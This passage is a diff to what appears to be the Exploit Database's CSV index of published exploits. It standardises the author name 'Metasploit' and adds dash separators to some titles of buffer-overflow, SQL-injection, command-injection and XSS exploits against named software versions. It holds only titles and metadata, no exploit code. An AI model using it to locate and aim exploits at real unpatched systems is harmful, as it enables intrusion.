Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 @@ -17453,13 +17453,13 @@ id,file,description,date,author,platform,type,port 20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0 20107,platforms/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create",2000-07-28,"Tanaka Akira",unix,local,0 20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - Checkin.prog Binary Execution",2000-06-28,"Tanaka Akira",unix,local,0 -20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload",2012-07-27,metasploit,php,webapps,0 -20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",2012-07-27,metasploit,windows,remote,0 -20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",2012-07-27,metasploit,linux,remote,0 +20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload",2012-07-27,Metasploit,php,webapps,0 +20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",2012-07-27,Metasploit,windows,remote,0 +20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",2012-07-27,Metasploit,linux,remote,0 20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Buffer Overflow (ASLR and DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (4)",2000-10-17,BoloTron,windows,remote,0 20145,platforms/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution",2000-08-08,"Brian Masney",linux,remote,0 -20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 (deptUploads_data.php groupid parameter) Blind SQLi",2012-07-30,Kc57,php,webapps,0 +20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - (deptUploads_data.php groupid parameter) Blind SQLi",2012-07-30,Kc57,php,webapps,0 20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - XSS",2012-07-31,"Oliver Karow",windows,webapps,0 20125,platforms/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",windows,remote,0 20126,platforms/irix/local/20126.c,"IRIX 6.5.x gr_osview Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local,0 @@ -17507,8 +17507,8 @@ id,file,description,date,author,platform,type,port 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) SQL Injection",2012-08-01,D4NB4R,php,webapps,0 20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0 20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0 -20173,platforms/php/webapps/20173.rb,"WebPageTest Arbitrary PHP File Upload",2012-08-02,metasploit,php,webapps,0 -20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",2012-08-02,metasploit,windows,remote,0 +20173,platforms/php/webapps/20173.rb,"WebPageTest Arbitrary PHP File Upload",2012-08-02,Metasploit,php,webapps,0 +20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",2012-08-02,Metasploit,windows,remote,0 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos,0 20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 20177,platforms/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 @@ -17536,9 +17536,9 @@ id,file,description,date,author,platform,type,port 20299,platforms/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (2)",2000-10-21,"Roelof Temmingh",windows,remote,0 20300,platforms/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (3)",2000-10-17,zipo,windows,remote,0 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver - Privilege Escalation",2012-08-02,anonymous,linux,local,0 -20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,metasploit,windows,remote,0 -20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 SQL Injection",2012-08-03,metasploit,windows,remote,0 -20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080 +20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,Metasploit,windows,remote,0 +20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 SQL Injection",2012-08-03,Metasploit,windows,remote,0 +20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,Metasploit,unix,remote,8080 20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0 20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0 20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal",2000-09-07,pestilence,php,webapps,0 @@ -17553,14 +17553,14 @@ id,file,description,date,author,platform,type,port 20217,platforms/linux/dos/20217.c,"RedHat Linux 6.1 i386 - Tmpwatch Recursive Write DoS",2000-09-09,"zenith parsec",linux,dos,0 20218,platforms/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read",2000-09-10,pestilence,cgi,remote,0 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME DoS",2000-09-12,Smashstack,windows,dos,0 -20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 /perl http Directory Disclosure",2000-09-11,anonymous,linux,remote,0 +20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 - /perl http Directory Disclosure",2000-09-11,anonymous,linux,remote,0 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",windows,dos,0 20222,platforms/windows/remote/20222.cpp,"Microsoft Windows 2000 telnet.exe NTLM Authentication",2000-08-14,@stake,windows,remote,0 20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 beta 3 - Search CGI",2000-09-15,dethy,windows,remote,0 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - DoS",1999-12-01,"Ussr Labs",windows,dos,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0 -20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,metasploit,windows,local,0 +20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,Metasploit,windows,local,0 20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server Remote DoS",1999-06-08,dethy,windows,dos,0 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin DoS",2000-09-15,"Rude Yak",multiple,dos,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Local Root Compromise",2000-06-24,"Stephen J. Friedl",sco,local,0 @@ -17594,8 +17594,8 @@ id,file,description,date,author,platform,type,port 20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0 -20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,metasploit,windows,local,0 -20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,metasploit,php,remote,0 +20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0 +20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,Metasploit,php,remote,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow ASLR bypass",2012-08-05,pole,windows,local,0 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request",2000-10-03,"BindView's Razor Team",windows,local,0 @@ -17630,7 +17630,7 @@ id,file,description,date,author,platform,type,port 20294,platforms/unix/local/20294.txt,"XFree86 3.3.5/3.3.6 Xlib Display Buffer Overflow",2000-10-12,"Michal Zalewski",unix,local,0 20295,platforms/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution",2012-08-06,rgod,windows,dos,0 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow ASLR Bypass (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 -20297,platforms/windows/remote/20297.rb,"Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",2012-08-06,metasploit,windows,remote,0 +20297,platforms/windows/remote/20297.rb,"Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",2012-08-06,Metasploit,windows,remote,0 20302,platforms/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (5)",2000-10-17,"Andrea Spabam",windows,remote,0 20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",cgi,remote,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPD 1.1/2.0 Alpha 1 visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 @@ -17650,7 +17650,7 @@ id,file,description,date,author,platform,type,port 20318,platforms/windows/remote/20318.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message RCE",2012-08-07,rgod,windows,remote,0 20319,platforms/windows/remote/20319.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion",2012-08-07,rgod,windows,remote,0 20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker Multiple Stored XSS Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0 -20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,metasploit,windows,remote,0 +20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,Metasploit,windows,remote,0 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access",2000-10-25,"Georgi Guninski",multiple,remote,0 20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request DoS",2000-10-25,"Alberto Solino",hardware,dos,0 20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 @@ -17683,8 +17683,8 @@ id,file,description,date,author,platform,type,port 20351,platforms/windows/webapps/20351.py,"mailenable enterprise 6.5 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (vmware appliance) 6.3 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot eval() Remote Code Execution",2012-08-08,metasploit,php,remote,0 -20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",2012-08-08,metasploit,windows,remote,0 +20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot eval() Remote Code Execution",2012-08-08,Metasploit,php,remote,0 +20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",2012-08-08,Metasploit,windows,remote,0 20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20358,platforms/php/webapps/20358.py,"WordPress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0 @@ -17720,7 +17720,7 @@ id,file,description,date,author,platform,type,port 20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 - Denial of Service",2000-11-01,"Fabio Pietrosanti",linux,dos,0 20390,platforms/php/webapps/20390.txt,"Joomla FireBoard Component (com_fireboard) SQL Injection",2012-08-09,Vulnerability-Lab,php,webapps,0 20391,platforms/php/webapps/20391.php,"Kamads Classifieds 2.0 - Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,php,webapps,0 -20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution",2012-08-10,metasploit,windows,remote,0 +20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution",2012-08-10,Metasploit,windows,remote,0 20393,platforms/windows/webapps/20393.py,"Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection",2012-08-09,loneferret,windows,webapps,0 20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow (1)",1998-12-26,duke,unix,remote,0 20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez and dumped",unix,remote,0 @@ -17823,8 +17823,8 @@ id,file,description,date,author,platform,type,port 20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (1)",2000-12-11,CyRaX,unix,remote,0 20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (2)",2000-12-07,diman,linux,remote,0 20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution",2000-12-11,rpc,cgi,remote,0 -20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection",2012-08-15,metasploit,windows,remote,7879 -20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management Remote Execution",2012-08-15,metasploit,java,remote,8080 +20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection",2012-08-15,Metasploit,windows,remote,7879 +20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management Remote Execution",2012-08-15,Metasploit,java,remote,8080 20503,platforms/cgi/remote/20503.html,"Leif M. Wright simplestmail.cgi 1.0 - Remote Command Execution",2000-12-11,rpc,cgi,remote,0 20504,platforms/cgi/remote/20504.html,"Leif M. Wright ad.cgi 1.0 Unchecked Input",2000-12-11,rpc,cgi,remote,0 20505,platforms/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 PIN Brute-Force",2000-12-14,@stake,palm_os,local,0 @@ -17944,7 +17944,7 @@ id,file,description,date,author,platform,type,port 20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution",2001-02-12,"Dixie Flatline",unix,local,0 20622,platforms/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer Remote Arbitrary Commands",2001-02-01,isno,linux,remote,0 20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal",2001-02-12,slipy,cgi,remote,0 -20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 Font Parsing Code Execution",2012-08-20,metasploit,windows,remote,0 +20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 Font Parsing Code Execution",2012-08-20,Metasploit,windows,remote,0 20625,platforms/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 File Disclosure",2001-02-12,cuctema,multiple,remote,0 20626,platforms/linux/local/20626.c,"Linux Kernel 2.2.x - sysctl() Memory Reading Proof of Concept",2001-02-09,"Chris Evans",linux,local,0 20627,platforms/php/webapps/20627.py,"IlohaMail Webmail Stored XSS",2012-08-18,"Shai rod",php,webapps,0 @@ -17991,11 +17991,11 @@ id,file,description,date,author,platform,type,port 20669,platforms/php/webapps/20669.py,"GWebmail 0.7.3 - XSS & LFI RCE Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 20710,platforms/php/webapps/20710.html,"VamCart 0.9 - CSRF",2012-08-22,DaOne,php,webapps,0 -20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,metasploit,cgi,webapps,0 +20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,Metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro CSRF",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail Multiple Stored XSS Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 -20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 -20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload",2012-08-22,metasploit,php,webapps,0 +20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 +20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload",2012-08-22,Metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Stored XSS",2012-08-20,"Shai rod",php,webapps,0 20677,platforms/windows/webapps/20677.txt,"IOServer - ('Root Directory'/Trailing Backslash) Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0 @@ -18065,7 +18065,7 @@ id,file,description,date,author,platform,type,port 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - LFI",2012-08-23,CorryL,php,webapps,0 20762,platforms/php/webapps/20762.php,"webpa <= 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy DoS",2001-04-16,"SecureXpert Labs",windows,dos,0 -20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl Command Injection",2012-08-31,metasploit,windows,remote,0 +20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl Command Injection",2012-08-31,Metasploit,windows,remote,0 20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0 20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 @@ -18100,7 +18100,7 @@ id,file,description,date,author,platform,type,port 20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0 20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0 20795,platforms/linux/local/20795.sh,"Sendfile 1.x/2.1 - Local Privileged Arbitrary Command Execution",2001-04-24,psheep,linux,local,0 -20796,platforms/linux/remote/20796.rb,"Zabbix Server Arbitrary Command Execution",2012-08-27,metasploit,linux,remote,0 +20796,platforms/linux/remote/20796.rb,"Zabbix Server Arbitrary Command Execution",2012-08-27,Metasploit,linux,remote,0 20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x Path Traversal",2001-04-24,neme-dhc,multiple,remote,0 20798,platforms/linux/local/20798.sh,"Sendfile 1.x/2.1 - Forced Privilege Lowering Failure",2001-04-24,"Cade Cairns",linux,local,0 20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote,0 @@ -18128,7 +18128,7 @@ id,file,description,date,author,platform,type,port 20821,platforms/hardware/dos/20821.txt,"Cisco HSRP Denial of Service",2001-05-03,bashis,hardware,dos,0 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0 -20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 +20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 20825,platforms/windows/remote/20825.txt,"michael lamont savant http server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos,0 @@ -18162,12 +18162,12 @@ id,file,description,date,author,platform,type,port 20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 -20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 (site.php id parameter) SQL Injection",2012-08-27,JIKO,php,webapps,0 +20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - (site.php id parameter) SQL Injection",2012-08-27,JIKO,php,webapps,0 20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET PoC",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 20862,platforms/php/webapps/20862.txt,"WordPress Count per Day Plugin 3.2.3 - XSS",2012-08-27,Crim3R,php,webapps,0 -20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 +20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0 -20865,platforms/java/remote/20865.rb,"Java 7 Applet Remote Code Execution",2012-08-27,metasploit,java,remote,0 +20865,platforms/java/remote/20865.rb,"Java 7 Applet Remote Code Execution",2012-08-27,Metasploit,java,remote,0 20866,platforms/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 @@ -18278,7 +18278,7 @@ id,file,description,date,author,platform,type,port 20978,platforms/hardware/remote/20978.pl,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access (4)",2001-06-27,blackangels,hardware,remote,0 20979,platforms/linux/local/20979.c,"Linux Kernel 2.2 / 2.4 - procfs Stream Redirection to Process Memory Local Root",2001-06-27,zen-parse,linux,local,0 20980,platforms/windows/remote/20980.c,"Oracle 8i TNS Listener Buffer Overflow",2001-07-20,benjurry,windows,remote,0 -20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 +20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 - (Build 8410) Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution",2001-06-28,"Igor Dobrovitski",cgi,remote,0 20983,platforms/php/webapps/20983.pl,"Joomla Spider Calendar Lite (com_spidercalendar) SQL Injection",2012-09-01,D4NB4R,php,webapps,0 20984,platforms/osx/remote/20984.txt,"Apple Mac OS X 10 nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote,0 @@ -18327,7 +18327,7 @@ id,file,description,date,author,platform,type,port 21030,platforms/windows/remote/21030.txt,"Snapstream Personal Video Station 1.2 a PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 -21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",2012-09-07,metasploit,windows,remote,3200 +21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",2012-09-07,Metasploit,windows,remote,3200 21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 Plaintext Password",2001-07-26,John,windows,remote,0 21036,platforms/windows/remote/21036.pl,"WS-FTP 2.0 Anonymous Multiple FTP Command Buffer Overflow",2001-07-25,andreas,windows,remote,0 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x xploitation Via LPD",2001-06-23,zen-parse,linux,remote,0 @@ -18343,7 +18343,7 @@ id,file,description,date,author,platform,type,port 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 DoS",1999-04-09,Epic,cgi,dos,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x - Buffer Overflow (2)",1995-02-17,Xtremist,linux,remote,0 -21833,platforms/php/webapps/21833.rb,"PhpTax pfilez Parameter Exec Remote Code Injection",2012-10-10,metasploit,php,webapps,0 +21833,platforms/php/webapps/21833.rb,"PhpTax pfilez Parameter Exec Remote Code Injection",2012-10-10,Metasploit,php,webapps,0 21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3_ greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 21053,platforms/multiple/webapps/21053.txt,"Splunk <= 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,php,webapps,0 @@ -18370,13 +18370,13 @@ id,file,description,date,author,platform,type,port 21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 Weak Password Encryption",2001-08-20,MacSec,osx,local,0 21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service",2001-08-21,V9,bsd,dos,0 21078,platforms/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 Weak Password Encryption",2001-08-23,"Desmond Irvine",multiple,local,0 -21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File 